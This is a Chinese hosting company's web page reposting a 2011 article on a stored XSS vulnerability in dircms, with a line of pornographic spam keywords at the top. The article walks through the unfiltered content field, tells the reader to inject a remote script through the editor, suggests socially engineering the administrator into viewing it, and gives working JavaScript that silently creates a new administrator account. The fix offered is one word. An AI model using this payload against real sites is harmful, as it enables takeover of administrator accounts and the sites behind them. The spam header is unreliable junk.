亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網(wǎng)絡(luò),我們將竭誠為您提供優(yōu)質(zhì)的服務(wù)! 誠征網(wǎng)絡(luò)推廣 | 網(wǎng)站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯(lián)系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業(yè)務(wù)咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發(fā)消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術(shù)支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當(dāng)前位置:首頁 >> 技術(shù)文章 >> 文章瀏覽
技術(shù)文章

dircms XSS漏洞和利用方法及修復(fù)

添加時間:2011-1-30  添加: admin 

1         $info['content']=add_alt($info['content'],$info['title']); //////////////////////自動加 ALT標(biāo)簽

2                 $info['title']=sub_string($info['title'],160,'');        //標(biāo)題

3                 $info['keywords']=sub_string($info['keywords'],100,'');  //關(guān)鍵字

4                 $info['content']=stripslashes($info['content']);   //這里是內(nèi)容  沒有使用sub_string過濾

5                 $info['status']=in_array($_groupid,$passpriv) || $_groupid==1?1:0;
再看  sub_string

1 function sub_string($string, $length, $dot='')

2 {

3         $string=trim($string);

4         $strlen = strlen($string);

5         if($strlen <= $length) return $string;

6         $string = str_replace(array('&nbsp;', '&amp;', '&quot;', '&#039;', '&ldquo;', '&rdquo;', '&mdash;', '&lt;', '&gt;', '&middot;', '&hellip;'), array(' ', '&', '"', "'", '“', '”', '—', '<', '>', '·', '…'), $string);   //這里做了轉(zhuǎn)義  -0-! 要是標(biāo)題沒轉(zhuǎn)換更好。。。。。。
利用方法 在FCKEDIT里點源代碼
然后寫 < src="http://127.0.0.1/1.js" </>
這里簡單 不明白的拿塊豆腐自殺好了

然后等待管理員查看投稿的文章  (這個你可以社工他)  就會觸發(fā)XSS攻擊
遠(yuǎn)程JS里寫  當(dāng)然  內(nèi)容限制長度是500 也可以不用調(diào)用遠(yuǎn)程直接寫進(jìn)去可以了

1 var oReq = new ActiveXObject("MSXML2.XMLHTTP");

2 var str = "do_submit=1&newadmin[username]=t00ls&newadmin[allowmultilogin]=1&newadmin[roleid]=1&newadmin[disabled]=0";

3 oReq.open("POST","http://127.0.0.1/admin.php?file=admin&action=add",false);

4 oReq.setRequestHeader("Content-Length",str.length); 

5 oReq.setRequestHeader("CONTENT-TYPE","application/x-www-form-urlencoded");

6 oReq.send(str);

newadmin[username]=t00ls  為會員注冊賬號    既可提升到管理員權(quán)限

修復(fù):過濾

關(guān)健詞: XSS漏洞

分享到:

頂部 】 【 關(guān)閉
版權(quán)所有:佛山思海電腦網(wǎng)絡(luò)有限公司 ©1998-2024 All Rights Reserved.
聯(lián)系電話:(0757)22630313、22633833
中華人民共和國增值電信業(yè)務(wù)經(jīng)營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網(wǎng)站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網(wǎng)安 舉報有獎  警警  手機打開網(wǎng)站